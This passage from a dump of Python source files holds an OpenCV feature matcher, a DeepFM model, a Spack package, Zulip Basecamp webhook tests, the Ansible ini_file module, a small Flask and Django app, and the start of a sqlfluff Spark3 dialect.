left-side of line\n is_in = not is_in\n return is_in\n\n\nclass FlannBasedMatcher():\n\n def __init__(self, origin):\n self.origin 
= origin\n self.kp, self.des = SIFT.detectAndCompute(origin, None)\n logger.debug(f'FlannBasedMatcher init: shape ({origin.shape})')\n\n def match(self, query, ret_square=True, draw=False, scope=None):\n if self.des is None:\n logger.debug('feature points is None')\n if ret_square:\n return None\n return False\n\n if scope is not None:\n logger.debug(f'before: {len(self.kp)}')\n logger.debug(f'scope: {scope}')\n kp0, des0 = [], []\n for kp, des in zip(self.kp, self.des):\n if scope[0][0] <= kp.pt[0] and scope[0][1] <= kp.pt[1] and kp.pt[0] <= scope[1][0] and kp.pt[1] <= scope[1][1]:\n kp0.append(kp)\n des0.append(des)\n logger.debug(f'after: {len(kp0)}')\n kp0, des0 = np.array(kp0), np.array(des0)\n else:\n kp0, des0 = self.kp, self.des\n\n h, w = query.shape\n kp, des = SIFT.detectAndCompute(query, None)\n\n index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n search_params = dict(checks=50)\n flann = cv2.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des, des0, k=2)\n\n \"\"\"store all the good matches as per Lowe's ratio test.\"\"\"\n good = []\n for x, y in matches:\n if x.distance < GOOD_DISTANCE_LIMIT * y.distance:\n good.append(x)\n\n \"\"\"draw the result\"\"\"\n if draw:\n result = cv2.drawMatches(\n query, kp, self.origin, kp0, good, None)\n plt.imshow(result, 'gray')\n plt.show()\n\n if len(good) <= 4 or len(good) / len(des) < 0.2:\n logger.debug(\n f'not enough good matches are found: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)}')\n if ret_square:\n return None\n return False\n\n \"\"\"get the coordinates of good matches\"\"\"\n src_pts = np.float32(\n [kp[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n dst_pts = np.float32(\n [kp0[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n\n \"\"\"calculated transformation matrix and the mask\"\"\"\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n matchesMask = mask.ravel().tolist()\n\n if M is None:\n logger.debug('calculated transformation matrix failed')\n if ret_square:\n return None\n return False\n\n pts = np.float32([[0, 0], [0, h-1], [w-1, h-1],\n [w-1, 0]]).reshape(-1, 1, 2)\n dst = cv2.perspectiveTransform(pts, M)\n dst_list = np.int32(dst).reshape(4, 2).tolist()\n\n better = filter(lambda m: is_in_poly(\n kp0[m.trainIdx].pt, dst_list), good)\n better_kp_x = [kp[m.queryIdx].pt[0] for m in better]\n if len(better_kp_x):\n good_area_rate = np.ptp(better_kp_x) / w\n else:\n good_area_rate = 0\n\n \"\"\"draw the result\"\"\"\n if draw or MATCHER_DEBUG:\n origin = np.array(self.origin)\n cv2.polylines(origin, [np.int32(dst)], True, 0, 2, cv2.LINE_AA)\n draw_params = dict(matchColor=(\n 0, 255, 0), singlePointColor=None, matchesMask=matchesMask, flags=2)\n result = cv2.drawMatches(\n query, kp, origin, kp0, good, None, **draw_params)\n plt.imshow(result, 'gray')\n plt.show()\n\n if abs(dst[0][0][0] - dst[1][0][0]) > 30 or abs(dst[2][0][0] - dst[3][0][0]) > 30 or abs(dst[0][0][1] - dst[3][0][1]) > 30 or abs(dst[1][0][1] - dst[2][0][1]) > 30:\n logger.debug(f'square is not rectangle: {dst_list}')\n if ret_square:\n return None\n return False\n\n if good_area_rate < 0.5:\n logger.debug(f'good_area_rate is not enough: {good_area_rate}')\n if ret_square:\n return None\n return False\n\n logger.info(\n f'matches: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)} / {good_area_rate}')\n\n logger.debug(f'find in {dst_list}')\n\n if ret_square:\n return dst_list\n return True\n"} {"ext": "py", "sha": "1a305f93b025dff8077f2da2ea70fa4f020a9213", 
"content": "# -*- coding:utf-8 -*-\n\"\"\"\nAuthor:\n Weichen Shen,wcshen1994@163.com\n\nReference:\n [1] Guo H, Tang R, Ye Y, et al. Deepfm: a factorization-machine based neural network for ctr prediction[J]. arXiv preprint arXiv:1703.04247, 2017.(https://arxiv.org/abs/1703.04247)\n\n\"\"\"\n\nimport tensorflow as tf\n\nfrom ..input_embedding import preprocess_input_embedding, get_linear_logit\nfrom ..layers.core import PredictionLayer, DNN\nfrom ..layers.interaction import FM\nfrom ..layers.utils import concat_fun\nfrom ..utils import check_feature_config_dict\n\n\ndef DeepFM(feature_dim_dict, embedding_size=8,\n use_fm=True, dnn_hidden_units=(128, 128), l2_reg_linear=0.00001, l2_reg_embedding=0.00001, l2_reg_dnn=0,\n init_std=0.0001, seed=1024, dnn_dropout=0, dnn_activation='relu', dnn_use_bn=False, task='binary'):\n \"\"\"Instantiates the DeepFM Network architecture.\n\n :param feature_dim_dict: dict,to indicate sparse field and dense field like {'sparse':{'field_1':4,'field_2':3,'field_3':2},'dense':['field_4','field_5']}\n :param embedding_size: positive integer,sparse feature embedding_size\n :param use_fm: bool,use FM part or not\n :param dnn_hidden_units: list,list of positive integer or empty list, the layer number and units in each layer of DNN\n :param l2_reg_linear: float. L2 regularizer strength applied to linear part\n :param l2_reg_embedding: float. L2 regularizer strength applied to embedding vector\n :param l2_reg_dnn: float. L2 regularizer strength applied to DNN\n :param init_std: float,to use as the initialize std of embedding vector\n :param seed: integer ,to use as random seed.\n :param dnn_dropout: float in [0,1), the probability we will drop out a given DNN coordinate.\n :param dnn_activation: Activation function to use in DNN\n :param dnn_use_bn: bool. Whether use BatchNormalization before activation or not in DNN\n :param task: str, ``\"binary\"`` for binary logloss or ``\"regression\"`` for regression loss\n :return: A Keras model instance.\n \"\"\"\n check_feature_config_dict(feature_dim_dict)\n\n deep_emb_list, linear_emb_list, dense_input_dict, inputs_list = preprocess_input_embedding(feature_dim_dict,\n embedding_size,\n l2_reg_embedding,\n l2_reg_linear, init_std,\n seed,\n create_linear_weight=True)\n\n linear_logit = get_linear_logit(linear_emb_list, dense_input_dict, l2_reg_linear)\n\n fm_input = concat_fun(deep_emb_list, axis=1)\n deep_input = tf.keras.layers.Flatten()(fm_input)\n fm_out = FM()(fm_input)\n deep_out = DNN(dnn_hidden_units, dnn_activation, l2_reg_dnn, dnn_dropout,\n dnn_use_bn, seed)(deep_input)\n deep_logit = tf.keras.layers.Dense(\n 1, use_bias=False, activation=None)(deep_out)\n\n if len(dnn_hidden_units) == 0 and use_fm == False: # only linear\n final_logit = linear_logit\n elif len(dnn_hidden_units) == 0 and use_fm == True: # linear + FM\n final_logit = tf.keras.layers.add([linear_logit, fm_out])\n elif len(dnn_hidden_units) > 0 and use_fm == False: # linear + Deep\n final_logit = tf.keras.layers.add([linear_logit, deep_logit])\n elif len(dnn_hidden_units) > 0 and use_fm == True: # linear + FM + Deep\n final_logit = tf.keras.layers.add([linear_logit, fm_out, deep_logit])\n else:\n raise NotImplementedError\n\n output = PredictionLayer(task)(final_logit)\n model = tf.keras.models.Model(inputs=inputs_list, outputs=output)\n return model\n"} {"ext": "py", "sha": "1a305ffdb17c2cb3c68761e651cdef0d1f01d549", "content": "# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. 
See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack import *\n\n\nclass PyWidgetsnbextension(PythonPackage):\n \"\"\"IPython HTML widgets for Jupyter\"\"\"\n\n homepage = \"https://pypi.python.org/pypi/widgetsnbextension\"\n url = \"https://pypi.io/packages/source/w/widgetsnbextension/widgetsnbextension-1.2.6.tar.gz\"\n\n version('1.2.6', '0aa4e152c9ba2d704389dc2453f448c7')\n\n depends_on('py-setuptools', type='build')\n depends_on('python@2.7:2.8,3.3:')\n depends_on('py-jupyter-notebook@4.2.0:', type=('build', 'run'))\n"} {"ext": "py", "sha": "1a306050302d9dc0044c00e81353241d282bb2b0", "content": "from zerver.lib.test_classes import WebhookTestCase\n\nTOPIC = \"Zulip HQ\"\n\n\nclass BasecampHookTests(WebhookTestCase):\n STREAM_NAME = \"basecamp\"\n URL_TEMPLATE = \"/api/v1/external/basecamp?stream={stream}&api_key={api_key}\"\n FIXTURE_DIR_NAME = \"basecamp\"\n\n def test_basecamp_makes_doc_active(self) -> None:\n expected_message = \"Tomasz activated the document [New doc](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214).\"\n self._send_and_test_message(\"doc_active\", expected_message)\n\n def test_basecamp_makes_doc_archived(self) -> None:\n expected_message = \"Tomasz archived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_archived\", expected_message)\n\n def test_basecamp_makes_doc_changed_content(self) -> None:\n expected_message = \"Tomasz changed content of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214).\"\n self._send_and_test_message(\"doc_content_changed\", expected_message)\n\n def test_basecamp_makes_doc_changed_title(self) -> None:\n expected_message = \"Tomasz changed title of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214).\"\n self._send_and_test_message(\"doc_title_changed\", expected_message)\n\n def test_basecamp_makes_doc_publicized(self) -> None:\n expected_message = \"Tomasz publicized the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_publicized\", expected_message)\n\n def test_basecamp_makes_doc_created(self) -> None:\n expected_message = \"Tomasz created the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_created\", expected_message)\n\n def test_basecamp_makes_doc_trashed(self) -> None:\n expected_message = \"Tomasz trashed the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_trashed\", expected_message)\n\n def test_basecamp_makes_doc_unarchived(self) -> None:\n expected_message = \"Tomasz unarchived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988).\"\n self._send_and_test_message(\"doc_unarchive\", expected_message)\n\n def test_basecamp_makes_questions_answer_archived(self) -> None:\n expected_message = \"Tomasz archived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question?](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)\"\n self._send_and_test_message(\"questions_answer_archived\", expected_message)\n\n def test_basecamp_makes_questions_answer_content_changed(self) -> None:\n expected_message = \"Tomasz changed content 
of the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"questions_answer_content_changed\", expected_message)\n\n def test_basecamp_makes_questions_answer_created(self) -> None:\n expected_message = \"Tomasz created the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"questions_answer_created\", expected_message)\n\n def test_basecamp_makes_questions_answer_trashed(self) -> None:\n expected_message = \"Tomasz trashed the [answer](https://3.basecamp.com/3688623/buckets/2957043/question_answers/432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"questions_answer_trashed\", expected_message)\n\n def test_basecamp_makes_questions_answer_unarchived(self) -> None:\n expected_message = \"Tomasz unarchived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"questions_answer_unarchived\", expected_message)\n\n def test_basecamp_makes_question_archived(self) -> None:\n expected_message = \"Tomasz archived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"question_archived\", expected_message)\n\n def test_basecamp_makes_question_created(self) -> None:\n expected_message = \"Tomasz created the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"question_created\", expected_message)\n\n def test_basecamp_makes_question_trashed(self) -> None:\n expected_message = \"Tomasz trashed the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"question_trashed\", expected_message)\n\n def test_basecamp_makes_question_unarchived(self) -> None:\n expected_message = \"Tomasz unarchived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747).\"\n self._send_and_test_message(\"question_unarchived\", expected_message)\n\n def test_basecamp_makes_message_archived(self) -> None:\n expected_message = \"Tomasz archived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_archived\", expected_message)\n\n def test_basecamp_makes_message_content_change(self) -> None:\n expected_message = \"Tomasz changed content of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_content_changed\", expected_message)\n\n def test_basecamp_makes_message_created(self) -> None:\n expected_message = \"Tomasz created the message [Message Title](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_created\", expected_message)\n\n def test_basecamp_makes_message_title_change(self) -> None:\n expected_message = \"Tomasz changed subject of the message [Message Title 
new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_title_changed\", expected_message)\n\n def test_basecamp_makes_message_trashed(self) -> None:\n expected_message = \"Tomasz trashed the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_trashed\", expected_message)\n\n def test_basecamp_makes_message_unarchived(self) -> None:\n expected_message = \"Tomasz unarchived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605).\"\n self._send_and_test_message(\"message_unarchived\", expected_message)\n\n def test_basecamp_makes_todo_list_created(self) -> None:\n expected_message = \"Tomasz created the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190).\"\n self._send_and_test_message(\"todo_list_created\", expected_message)\n\n def test_basecamp_makes_todo_list_description_changed(self) -> None:\n expected_message = \"Tomasz changed description of the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190).\"\n self._send_and_test_message(\"todo_list_description_changed\", expected_message)\n\n def test_basecamp_makes_todo_list_modified(self) -> None:\n expected_message = \"Tomasz changed name of the todo list [NEW Name TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190).\"\n self._send_and_test_message(\"todo_list_name_changed\", expected_message)\n\n def test_basecamp_makes_todo_assignment_changed(self) -> None:\n expected_message = \"Tomasz changed assignment of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_assignment_changed\", expected_message)\n\n def test_basecamp_makes_todo_completed(self) -> None:\n expected_message = \"Tomasz completed the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_completed\", expected_message)\n\n def test_basecamp_makes_todo_uncompleted(self) -> None:\n expected_message = \"Tomasz uncompleted the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_uncompleted\", expected_message)\n\n def test_basecamp_makes_todo_created(self) -> None:\n expected_message = \"Tomasz created the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_created\", expected_message)\n\n def test_basecamp_makes_todo_due_on_changed(self) -> None:\n expected_message = \"Tomasz changed due_on of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"todo_due_on_changed\", expected_message)\n\n def test_basecamp_makes_comment_created(self) -> None:\n expected_message = \"Tomasz created the [comment](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624#__recording_427058780) of the task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624).\"\n self._send_and_test_message(\"comment_created\", expected_message)\n\n def _send_and_test_message(self, fixture_name: str, expected_message: str) -> None:\n self.check_webhook(fixture_name, TOPIC, expected_message)\n"} {"ext": "py", "sha": "1a30612dcf636e3419486806c0248885beb3a88e", "content": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 
2012, Jan-Piet Mens \n# Copyright: (c) 2015, Ales Nosek \n# Copyright: (c) 2017, Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nDOCUMENTATION = r'''\n---\nmodule: ini_file\nshort_description: Tweak settings in INI files\nextends_documentation_fragment: files\ndescription:\n - Manage (add, remove, change) individual settings in an INI-style file without having\n to manage the file as a whole with, say, M(ansible.builtin.template) or M(ansible.builtin.assemble).\n - Adds missing sections if they don't exist.\n - Before Ansible 2.0, comments are discarded when the source file is read, and therefore will not show up in the destination file.\n - Since Ansible 2.3, this module adds missing ending newlines to files to keep in line with the POSIX standard, even when\n no other modifications need to be applied.\noptions:\n path:\n description:\n - Path to the INI-style file; this file is created if required.\n - Before Ansible 2.3 this option was only usable as I(dest).\n type: path\n required: true\n aliases: [ dest ]\n section:\n description:\n - Section name in INI file. This is added if C(state=present) automatically when\n a single value is being set.\n - If left empty or set to C(null), the I(option) will be placed before the first I(section).\n - Using C(null) is also required if the config format does not support sections.\n type: str\n required: true\n option:\n description:\n - If set (required for changing a I(value)), this is the name of the option.\n - May be omitted if adding/removing a whole I(section).\n type: str\n value:\n description:\n - The string value to be associated with an I(option).\n - May be omitted when removing an I(option).\n type: str\n backup:\n description:\n - Create a backup file including the timestamp information so you can get\n the original file back if you somehow clobbered it incorrectly.\n type: bool\n default: no\n state:\n description:\n - If set to C(absent) the option or section will be removed if present instead of created.\n type: str\n choices: [ absent, present ]\n default: present\n no_extra_spaces:\n description:\n - Do not insert spaces before and after '=' symbol.\n type: bool\n default: no\n create:\n description:\n - If set to C(no), the module will fail if the file does not already exist.\n - By default it will create the file if it is missing.\n type: bool\n default: yes\n allow_no_value:\n description:\n - Allow option without value and without '=' symbol.\n type: bool\n default: no\nnotes:\n - While it is possible to add an I(option) without specifying a I(value), this makes no sense.\n - As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well.\nauthor:\n - Jan-Piet Mens (@jpmens)\n - Ales Nosek (@noseka1)\n'''\n\nEXAMPLES = r'''\n# Before Ansible 2.3, option 'dest' was used instead of 'path'\n- name: Ensure \"fav=lemonade is in section \"[drinks]\" in specified file\n community.general.ini_file:\n path: /etc/conf\n section: drinks\n option: fav\n value: lemonade\n mode: '0600'\n backup: yes\n\n- name: Ensure \"temperature=cold is in section \"[drinks]\" in specified file\n community.general.ini_file:\n path: /etc/anotherconf\n section: drinks\n option: temperature\n value: cold\n backup: yes\n'''\n\nimport os\nimport re\nimport tempfile\nimport traceback\n\nfrom ansible.module_utils.basic import AnsibleModule\n\n\ndef 
match_opt(option, line):\n option = re.escape(option)\n return re.match('( |\\t)*%s( |\\t)*(=|$)' % option, line) \\\n or re.match('#( |\\t)*%s( |\\t)*(=|$)' % option, line) \\\n or re.match(';( |\\t)*%s( |\\t)*(=|$)' % option, line)\n\n\ndef match_active_opt(option, line):\n option = re.escape(option)\n return re.match('( |\\t)*%s( |\\t)*(=|$)' % option, line)\n\n\ndef do_ini(module, filename, section=None, option=None, value=None,\n state='present', backup=False, no_extra_spaces=False, create=True,\n allow_no_value=False):\n\n diff = dict(\n before='',\n after='',\n before_header='%s (content)' % filename,\n after_header='%s (content)' % filename,\n )\n\n if not os.path.exists(filename):\n if not create:\n module.fail_json(rc=257, msg='Destination %s does not exist !' % filename)\n destpath = os.path.dirname(filename)\n if not os.path.exists(destpath) and not module.check_mode:\n os.makedirs(destpath)\n ini_lines = []\n else:\n ini_file = open(filename, 'r')\n try:\n ini_lines = ini_file.readlines()\n finally:\n ini_file.close()\n\n if module._diff:\n diff['before'] = ''.join(ini_lines)\n\n changed = False\n\n # ini file could be empty\n if not ini_lines:\n ini_lines.append('\\n')\n\n # last line of file may not contain a trailing newline\n if ini_lines[-1] == \"\" or ini_lines[-1][-1] != '\\n':\n ini_lines[-1] += '\\n'\n changed = True\n\n # append fake section lines to simplify the logic\n # At top:\n # Fake random section to do not match any other in the file\n # Using commit hash as fake section name\n fake_section_name = \"ad01e11446efb704fcdbdb21f2c43757423d91c5\"\n\n # Insert it at the beginning\n ini_lines.insert(0, '[%s]' % fake_section_name)\n\n # At botton:\n ini_lines.append('[')\n\n # If no section is defined, fake section is used\n if not section:\n section = fake_section_name\n\n within_section = not section\n section_start = 0\n msg = 'OK'\n if no_extra_spaces:\n assignment_format = '%s=%s\\n'\n else:\n assignment_format = '%s = %s\\n'\n\n for index, line in enumerate(ini_lines):\n if line.startswith('[%s]' % section):\n within_section = True\n section_start = index\n elif line.startswith('['):\n if within_section:\n if state == 'present':\n # insert missing option line at the end of the section\n for i in range(index, 0, -1):\n # search backwards for previous non-blank or non-comment line\n if not re.match(r'^[ \\t]*([#;].*)?$', ini_lines[i - 1]):\n if not value and allow_no_value:\n ini_lines.insert(i, '%s\\n' % option)\n else:\n ini_lines.insert(i, assignment_format % (option, value))\n msg = 'option added'\n changed = True\n break\n elif state == 'absent' and not option:\n # remove the entire section\n del ini_lines[section_start:index]\n msg = 'section removed'\n changed = True\n break\n else:\n if within_section and option:\n if state == 'present':\n # change the existing option line\n if match_opt(option, line):\n if not value and allow_no_value:\n newline = '%s\\n' % option\n else:\n newline = assignment_format % (option, value)\n option_changed = ini_lines[index] != newline\n changed = changed or option_changed\n if option_changed:\n msg = 'option changed'\n ini_lines[index] = newline\n if option_changed:\n # remove all possible option occurrences from the rest of the section\n index = index + 1\n while index < len(ini_lines):\n line = ini_lines[index]\n if line.startswith('['):\n break\n if match_active_opt(option, line):\n del ini_lines[index]\n else:\n index = index + 1\n break\n elif state == 'absent':\n # delete the existing line\n if 
match_active_opt(option, line):\n del ini_lines[index]\n changed = True\n msg = 'option changed'\n break\n\n # remove the fake section line\n del ini_lines[0]\n del ini_lines[-1:]\n\n if not within_section and option and state == 'present':\n ini_lines.append('[%s]\\n' % section)\n if not value and allow_no_value:\n ini_lines.append('%s\\n' % option)\n else:\n ini_lines.append(assignment_format % (option, value))\n changed = True\n msg = 'section and option added'\n\n if module._diff:\n diff['after'] = ''.join(ini_lines)\n\n backup_file = None\n if changed and not module.check_mode:\n if backup:\n backup_file = module.backup_local(filename)\n\n try:\n tmpfd, tmpfile = tempfile.mkstemp(dir=module.tmpdir)\n f = os.fdopen(tmpfd, 'w')\n f.writelines(ini_lines)\n f.close()\n except IOError:\n module.fail_json(msg=\"Unable to create temporary file %s\", traceback=traceback.format_exc())\n\n try:\n module.atomic_move(tmpfile, filename)\n except IOError:\n module.ansible.fail_json(msg='Unable to move temporary \\\n file %s to %s, IOError' % (tmpfile, filename), traceback=traceback.format_exc())\n\n return (changed, backup_file, diff, msg)\n\n\ndef main():\n\n module = AnsibleModule(\n argument_spec=dict(\n path=dict(type='path', required=True, aliases=['dest']),\n section=dict(type='str', required=True),\n option=dict(type='str'),\n value=dict(type='str'),\n backup=dict(type='bool', default=False),\n state=dict(type='str', default='present', choices=['absent', 'present']),\n no_extra_spaces=dict(type='bool', default=False),\n allow_no_value=dict(type='bool', default=False),\n create=dict(type='bool', default=True)\n ),\n add_file_common_args=True,\n supports_check_mode=True,\n )\n\n path = module.params['path']\n section = module.params['section']\n option = module.params['option']\n value = module.params['value']\n state = module.params['state']\n backup = module.params['backup']\n no_extra_spaces = module.params['no_extra_spaces']\n allow_no_value = module.params['allow_no_value']\n create = module.params['create']\n\n (changed, backup_file, diff, msg) = do_ini(module, path, section, option, value, state, backup, no_extra_spaces, create, allow_no_value)\n\n if not module.check_mode and os.path.exists(path):\n file_args = module.load_file_common_arguments(module.params)\n changed = module.set_fs_attributes_if_different(file_args, changed)\n\n results = dict(\n changed=changed,\n diff=diff,\n msg=msg,\n path=path,\n )\n if backup_file is not None:\n results['backup_file'] = backup_file\n\n # Mission complete\n module.exit_json(**results)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a30616824a44a70a2e71e958137e9cfc4f8c4b0", "content": "from flask import request, jsonify\nimport json\nfrom urllib import parse as urlparse\nimport time\nimport sys\n\nimport sqlite3\nfrom dnfp import app, apputils\nfrom inventory import Inventory\nfrom skilltree import SkillTree\nfrom character import Character\nfrom libutil import LibUtil as myutil\n\ndef get_neople_ids(name, server):\n server_dict={'안톤':'anton','바칼':'bakal','카인':'cain','카시야스':'casillas',\n '디레지에':'diregie','힐더':'hilder','프레이':'prey','시로코':'siroco'}\n s_id=server_dict[server]\n\n cha_id_url = 'servers/'+s_id+'/characters?characterName='+urlparse.quote(name)+'&'\n\n try:\n cha_id_dic=myutil.load_api(cha_id_url)\n except:\n raise\n\n cha_id=cha_id_dic['rows'][0]['characterId']\n\n return s_id, cha_id\n \ndef create_char_json(s_id, cha_id, test_mode = False, epic_status = False):\n character = Character(cha_id, s_id, test_mode, 
custom_data = None)\n if character.status[0] != 'ok':\n return character.status[1]\n\n character.do_create_char_dict(epic_status, None)\n \n return character.char_stat\n\ndef make_char_stat(s_id, cha_id, test_mode = False, epic_status = True):\n char_stat = create_char_json(s_id, cha_id, test_mode = test_mode, epic_status = epic_status)\n\n return char_stat\n\n@app.route(\"/char\", methods=(\"GET\", \"POST\"))\ndef char_stat():\n name = request.args.get(\"name\")\n server = request.args.get(\"server\")\n\n sid, cid = get_neople_ids(name, server)\n\n char_stat = make_char_stat(sid, cid, test_mode = False, epic_status = False)\n return jsonify(char_stat)\n\n"} {"ext": "py", "sha": "1a30623e7acadb9a2f7c33096cf251952d89f382", "content": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass SessionTable(models.Model):\n sess_id = models.CharField(max_length=15)\n name = models.CharField(max_length=15)\n\n\nclass VoteTable(models.Model):\n value = models.IntegerField()\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n sess_id = models.OneToOneField(SessionTable, on_delete=models.CASCADE)\n\n\nclass SessionResults(models.Model):\n value = models.IntegerField()\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n "} {"ext": "py", "sha": "1a306362979e503de7a689895ed1e53a36f78d0a", "content": "\"\"\"The Spark SQL dialect for ANSI Compliant Spark3.\n\nInherits from ANSI.\nSpark SQL ANSI Mode is more restrictive regarding\nkeywords than the Default Mode, and still shares\nsome syntax with hive.\n\nBased on:\n- https://spark.apache.org/docs/latest/sql-ref.html\n- https://spark.apache.org/docs/latest/sql-ref-ansi-compliance.html\n- https://github.com/apache/spark/blob/master/sql/catalyst/src/main/antlr4/org/apache/spark/sql/catalyst/parser/SqlBase.g4\n\"\"\"\n\nfrom sqlfluff.core.parser import (\n AnyNumberOf,\n BaseSegment,\n Bracketed,\n CommentSegment,\n Conditional,\n Dedent,\n Delimited,\n Indent,\n NamedParser,\n OneOf,\n OptionallyBracketed,\n Ref,\n RegexLexer,\n Sequence,\n StringParser,\n SymbolSegment,\n Anything,\n)\n\nfrom sqlfluff.core.dialects import load_raw_dialect\nfrom sqlfluff.core.parser.segments.raw import CodeSegment, KeywordSegment\nfrom sqlfluff.dialects.dialect_spark3_keywords import (\n RESERVED_KEYWORDS,\n UNRESERVED_KEYWORDS,\n)\n\nansi_dialect = load_raw_dialect(\"ansi\")\nhive_dialect = load_raw_dialect(\"hive\")\nspark3_dialect = ansi_dialect.copy_as(\"spark3\")\n\nspark3_dialect.patch_lexer_matchers(\n [\n # Spark SQL, only -- is used for single-line comment\n RegexLexer(\n \"inline_comment\",\n r\"(--)[^\\n]*\",\n CommentSegment,\n segment_kwargs={\"trim_start\": \"--\"},\n ),\n # == and <=> are valid equal operations\n # <=> is a non-null equals in Spark SQL\n # https://spark.apache.org/docs/latest/api/sql/index.html#_10\n RegexLexer(\"equals\", r\"=|==|<=>\", CodeSegment),\n # identifiers are delimited with `\n # within a delimited identifier, ` is used to escape special characters, including `\n # Ex: select `delimited `` with escaped` from `just delimited`\n # https://spark.apache.org/docs/latest/sql-ref-identifier.html#delimited-identifier\n RegexLexer(\"back_quote\", r\"`([^`]|``)*`\", CodeSegment),\n ]\n)\n\n# Set the bare functions\nspark3_dialect.sets(\"bare_functions\").clear()\nspark3_dialect.sets(\"bare_functions\").update(\n [\n \"CURRENT_DATE\",\n \"CURRENT_TIMESTAMP\",\n \"CURRENT_USER\",\n ]\n)\n\n# Set the datetime 
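# --- Editor's aside (not part of the original record) ----------------------
# Hedged usage sketch for the spark3 dialect defined in this module: once it
# is registered, it is normally consumed through sqlfluff's simple API. The
# exact return shape varies by sqlfluff version, so treat this purely as an
# illustration of how the lexer patches above (the `<=>` operator and
# back-quoted identifiers) surface when linting Spark SQL.
import sqlfluff

violations = sqlfluff.lint(
    "SELECT `col a` FROM t WHERE `col a` <=> NULL",
    dialect="spark3",
)
for v in violations:
    # each violation is a dict with at least a rule code and a description
    print(v["code"], v["description"])
# ----------------------------------------------------------------------------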
